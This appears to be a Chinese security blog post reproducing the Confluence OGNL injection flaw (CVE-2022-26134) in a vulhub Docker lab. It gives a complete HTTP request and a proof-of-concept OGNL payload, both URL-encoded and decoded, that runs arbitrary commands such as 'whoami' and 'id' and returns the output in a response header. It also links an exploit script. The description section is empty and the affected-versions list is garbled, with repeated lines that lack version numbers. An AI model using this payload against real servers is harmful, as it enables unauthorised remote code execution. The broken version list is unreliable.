漏洞描述
影响版本
- Confluence Server and Data Center >= 1.3.0
- Confluence Server and Data Center
- Confluence Server and Data Center
- Confluence Server and Data Center
- Confluence Server and Data Center
- Confluence Server and Data Center
- Confluence Server and Data Center
- Confluence Server and Data Center
环境搭建
这里直接用vulhub里的环境,启动以后需要申请试用版许可证,配置好相关信息即可
docker-compose up -d
漏洞复现
漏洞利用发送如下请求即可执行任意命令,并在HTTP返回头中获取执行结果:
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: 127.0.0.1:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=8D0D4FB7E6B7456378BF7388889C86C0
Connection: close
测试POC
%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#a))}
工具复现:https://github.com/Nwqda/CVE-2022-26134(大佬写的脚本)
修复建议
升级到Atlassian Confluence Server and Data Center至安全版本。
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!